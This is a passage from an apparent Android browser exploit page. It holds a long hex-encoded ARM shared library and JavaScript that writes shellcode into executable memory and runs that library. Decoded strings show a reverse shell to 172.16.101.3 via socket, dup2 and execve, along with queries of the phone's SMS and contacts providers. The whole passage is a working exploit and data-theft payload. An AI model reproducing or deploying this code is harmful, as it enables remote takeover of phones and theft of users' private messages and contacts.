f400000008300000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707231005f5f61656162695f756e77696e645f6370705f707230005f5a4e37616e64726f69643134416e64726f696452756e74696d65396765744a4e49456e764576005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f6300736e7072696e746600736f5f6d61696e00666f726b0073797374656d00696e65745f6164647200736f636b657400636f6e6e6563740064757032006d656d7365740065786563766500667265650065786974005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f00727368656c6c2e736f0000110000001700000011000000140000000d000000000000000c000000050000000f000000000000000e0000000000000007000000150000001200000016000000020000000b00000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000300000008000000090000000a000000060000000000000000000000000000000000000010000000040000000000000013000000882e0000170000000030000017000000c02f000016010000c42f000016020000c82f000016050000cc2f000016060000d02f000016070000d42f000016080000d82f0000160a0000dc2f0000160b0000e02f0000160c0000e42f0000160d0000e82f0000160e0000ec2f0000160f0000f02f000016100000f42f000016110000f82f000016120000fc2f00001613000004e02de504e09fe50ee08fe008f0bee5f829000000c68fe202ca8ce2f8f9bce500c68fe202ca8ce2f0f9bce500c68fe202ca8ce2e8f9bce500c68fe202ca8ce2e0f9bce500c68fe202ca8ce2d8f9bce500c68fe202ca8ce2d0f9bce500c68fe202ca8ce2c8f9bce500c68fe202ca8ce2c0f9bce500c68fe202ca8ce2b8f9bce500c68fe202ca8ce2b0f9bce500c68fe202ca8ce2a8f9bce500c68fe202ca8ce2a0f9bce500c68fe202ca8ce298f9bce500c68fe202ca8ce290f9bce500c68fe202ca8ce288f9bce500c68fe202ca8ce280f9bce500482de904b08de20c309fe503308fe00300a0e1c9ffffeb0088bde86c29000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1b3ffffeb0030a0e10300a0e104d04be20088bde8b8ffffff0829000008b503689a69904708bd10b50468d4f88440a04710bd0cb413b504ab046853f8042bd4f88c400193a04702b0bde8104002b070470cb413b504ab046853f8042bd4f898400193a04702b0bde8104002b070470cb413b504ab046853f8042bd4f8c8400193a04702b0bde8104002b070470cb413b504ab046853f8042bd4f8d4400193a04702b0bde8104002b070470cb413b504ab046853f8042bd4f8e0400193a04702b0bde8104002b070470cb413b504ab046853f8042bd4f8cc410193a04702b0bde8104002b0704700002de9f04f0746dff878a395b0fa44daf80030581ccaf80000fff7eeeed94904467944fff787ff216805462046d64ad74bd1f8c46129467a447b44b047024629462046fff7cdffd24981460620d14a4b4679447a44fff7d6eecf4920467944fff769ff226883462046cc4b5946d2f8c4c1cb4a7b447a44e0472368804639462046d3f89c52a84703464246c64d59462046fff7a6ffc449074620464ff0000b7d447944fff747ffc14a01462046c04b7a447b44fff744ff024649462046fff745ffbc49064620467944fff734ffba4a01462046ba4b7a447b44fff731ff02463b46cdf800b03146cdf804b02046cdf808b0b34fcdf80cb0fff728ffb249064620467f447944fff716ffaf4a80462b46414620467a44fff713ffac4a2b468146414620467a44fff70bffa94a08904146a94b20467a447b44fff702ffa74a3b460990414620467a44fff7fafea44a0a904146a34b20467a447b44fff7f1fea14a0b904146a14b20467a447b44fff7e8fe9f4a0c9041469e4b20467a447b44fff7dffe9c4a0d9041469c4b20467a447b44fff7d6fe9a4a3b460e90414620467a44fff7cefe974a41460f90964b20467a447b44fff7c5fe4ff40010fff72aee924a4ff400110746daf800307a44fff728ee0546314620464a46fff7c7fe002800f0c4808a48cdf814b08a497844794412901391c5f500117819129a059b4ff0000afff70eee059a3146804605442046531c099a0593fff7b8fe7f49079006207e4a079b79447a44fff7eeed7c487d497844794410901191079a924580f28e80baf1000f05ddb5f5001f02da2c237b55013531460a9a53462046fff778fe0690206800220699d0f8a43220469847814631460b9a069b2046fff787fe83460c9a20465b463146fff780fe04285bd8dfe800f0521803294d0031460d9a5b462046fff791fe07ee900a5f4a7819c5f500114b467a44f7eee70acded000bfff7b0ed40e00e9a5b4620463146fff76dfe574acde900014b467819c5f500117a44fff7a0ed2fe031460f9a5b462046fff72ffe2168844600222046d1f8a4326146cdf810c0984783460090c5f50011119a4b467819fff786ed226880462046ddf810c0d2f8a8325a46614698470ce07819c5f50011109a03e0139a7819c5f500114b46fff76eed804620684a46454406990af1010ad0f8a832204698476de720463146089afff703fe00287ff444af30492b460620304a79447a44fff746ed384615b0bde8f08f14280000180600001d0600002e060000320600003806000041060000410600003906000052070000390600004a0600005b060000690600007b0600007f06000020070000ca060000d2060000d2060000cd060000da060000ce060000e2060000ef060000f5060000fb060000f0060000f7060000ec060000f2060000e7060000e1060000e5060000cf060000bb060000f1060000620400008a060000a70600009f06000011060000ed05000012030000710500002de9f0410546474c8cb00620464a7c4421467a44fff7dcec444a21462b4606207a44fff7d6ec6b6921460620404a00932b697a44fff7ccec3e487844fff7c6fd07463d487844fff7c1fd0646fff7d2ec431c06d1394a214606207a44fff7b8ec00e050b136487844fff7caec35487844fff7c6ec0cb0bde8f081334d40f62c102146324a4ff00208009006207d442b467a44fff79eec42f609412846adf81080adf81210fff7b2ec0590012106224046fff7b2ec04a910220546fff7b4ec28b9234a062021467a44fff782ecdff8848028460021fff7acec28460121fff7a8ec002428460221f84408adfff7a2ec21461022cdf8088028460394fff7a0ec164a02a9404609970a967a4408922a46fff79cec3846fff79eec3046fff79cec2046fff79eec40020000a8040000ab040000b4040000c4040000c8040000da040000da040000f304000000050000e8040000d3040000c8040000b504000008b10181b0b000840000000003b10181b00cb1a80000000003b10181b00cb1a80000000003b10181b00cb1a80000000003b10181b00cb1a80000000003b10181b00cb1a80000000003b10181b00cb1a80000000050f9ff7fa8ffff7f52f9ff7fb0b0a88056f9ff7fa4ffff7f6cf9ff7fa8ffff7f82f9ff7facffff7f98f9ff7fb0ffff7faef9ff7fb4ffff7fc4f9ff7fb8ffff7fdcf9ff7fb0af148008feff7fb0ac0b805cffff7f01000000616e64726f69642f6170702f41637469766974795468726561640063757272656e744170706c69636174696f6e0028294c616e64726f69642f6170702f4170706c69636174696f6e3b006578706c6f6974006170706c69636174696f6e2069732025700a00616e64726f69642f6e65742f55726900706172736500284c6a6176612f6c616e672f537472696e673b294c616e64726f69642f6e65742f5572693b00616e64726f69642f636f6e74656e742f436f6e746578745772617070657200676574436f6e74656e745265736f6c7665720028294c616e64726f69642f636f6e74656e742f436f6e74656e745265736f6c7665723b00616e64726f69642f636f6e74656e742f436f6e74656e745265736f6c76657200717565727900284c616e64726f69642f6e65742f5572693b5b4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f537472696e673b294c616e64726f69642f64617461626173652f437572736f723b00616e64726f69642f64617461626173652f437572736f72006d6f7665546f46697273740028295a006d6f7665546f4e65787400676574436f6c756d6e436f756e740028294900676574436f6c756d6e4e616d65002849294c6a6176612f6c616e672f537472696e673b00676574436f6c756d6e496e64657800284c6a6176612f6c616e672f537472696e673b29490067657454797065002849294900676574466c6f61740028492946006765744c6f6e67002849294a00676574537472696e6700636c6f7365002829560070726f766964657225643d000a726f772025643a00636f6c756d6e436f756e742069732025640a0025733d25660025733d256c6c640025733d25730025733d424c4f420025733d4e554c4c006c656e2069732025640a00656e7465722073656e646970632e736f006172726179206275666665722061646472657373206174202570006e632066696c652061742025702c6c656e20697320256400636f6e74656e743a2f2f736d7300636f6e74656e743a2f2f636f6d2e616e64726f69642e636f6e74616374732f636f6e746163747300666f726b206661696c6564006c6f67202d74206578706c6f69742060706d206c697374207061636b61676560006c6f67202d74206578706c6f697420606c73202e2f600069702069732025732c706f7274206973202564003137322e31362e3130312e3300636f6e6e656374207375636365737366756c6c79002f73797374656d2f62696e2f736800504154483d2f73797374656d2f62696e3a2f73797374656d2f7862696e3a2f62696e3a2f7573722f62696e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008006000003000000b42f00000200000080000000170000002c0500001400000011000000110000001c05000012000000100000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000b80200000a000000bb010000040000007404000001000000f900000001000000010100000100000009010000010000001601000001000000250100000100000031010000010000003e010000010000004a010000010000005c010000010000007901000001000000860100000100000092010000010000009b0100000e000000b10100001a000000882e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac05000000300000004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c024403727368656c6c2e736f0000006158a70b002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578746162002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b00000002000000480100004801000070010000030000000100000004000000100000001b0000000300000002000000b8020000b8020000bb010000000000000000000001000000000000002300000005000000020000007404000074040000a8000000020000000000000004000000040000002900000009000000020000001c0500001c05000010000000020000000000000004000000080000003200000009000000020000002c0500002c0500008000000002000000070000000400000008000000360000000100000006000000ac050000ac050000d4000000000000000000000004000000000000003b00000001000000060000008006000080060000f006000000000000000000000400000000000000410000000100000002000000700d0000700d000054000000000000000000000004000000000000004c0000000100007082000000c40d0000c40d000058000000080000000000000004000000080000005700000001000000320000001c0e00001c0e0000e5030000000000000000000001000000010000005f0000000f00000003000000882e0000881e000004000000000000000000000004000000000000006b00000006000000030000008c2e00008c1e00002801000003000000000000000400000008000000740000000100000003000000b42f0000b41f00004c00000000000000000000000400000000000000790000000100000003000000003000000020000004000000000000000000000004000000000000007f000000080000000300000004300000042000000400000000000000000000000400000000000000840000000100000030000000000000000420000010000000000000000000000001000000010000008d000000070000000000000000000000142000001c00000000000000000000000400000000000000a4000000030000700000000000000000302000003e00000000000000000000000100000000000000b40000000100000000000000000000006e2000001000000000000000000000000100000000000000010000000300000000000000000000007e200000c300000000000000000000000100000000000000";function write_shellcode(dlsym_addr,buffer){
//ldr r0,[pc,4]//0xe59f0004
//ldr r1,[pc,4]//0xe59f1004
//b shellcode;//0xea000001
//dlopen_addr//normalArrayBufferBackingStore
//dlsym_addr
//shellcode
//var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];
var stub=[0xe59f0004,0xe59f1004,0xea000001,normalArrayBufferBackingStore,normalArrayBufferLength];
var dv = get_dateview(buffer);
for(var i=0;i<stub.length;i++){
get_dateview(buffer).setUint32(i*4,stub[i],true);
}
dv =get_dateview(buffer+stub.length*4);
for(var i=0;i<shellcode.length;i++){
dv.setUint8(i,shellcode[i]);
}
return stub.length*4+shellcode.length;
}
function backup_original_code(start_address){
var backup_arr = [];
for(var i=0;i<shellcode.length+4096;i++){
backup_arr[i]=get_dateview(start_address).getUint8(i);
}
return backup_arr;
}
function restore_original_code(start_address,backup_arr){
for(var i=0;i<shellcode.length+4096;i++){
get_dateview(start_address).setUint8(i,backup_arr[i]);
}
}
var backup_arr=backup_original_code(rwxAddress);
var writed_len = write_shellcode(dlsym_addr,rwxAddress);
var args_view = new DataView(normalArrayBuffer,0,32);
var so_file_view = new DataView(normalArrayBuffer,4096);
var js_view = new DataView(normalArrayBuffer,0x100000);
args_view.setUint32(0,dlsym_addr+12,true);
args_view.setUint32(4,dlsym_addr,true);
args_view.setUint32(8,rwxAddress,true);
args_view.setUint32(12,writed_len,true);
args_view.setUint32(16,normalArrayBufferBackingStore+4096,true);
args_view.setUint32(20,so_str.length/2,true);
//args_view.setUint32(24,normalArrayBufferBackingStore+0x100000,true);
//args_view.setUint32(28,js_str.length,true);
log("length is "+so_str.length);
for(var i=0;i<so_str.length;i+=2){
var value = so_str.substr(i,2);
value = "0x"+value;
so_file_view.setUint8(i/2,parseInt(value));
}
huge_func({});
restore_original_code(rwxAddress,backup_arr);
/*setInterval(function () {
document.getElementById("message").innerHTML=
String.fromCharCode.apply(null, new Uint8Array(normalArrayBuffer,128,3000));
//log(String.fromCharCode.apply(null, new Uint8Array(normalArrayBuffer,128,1024)));
}, 1000);*/
</script>
</html>
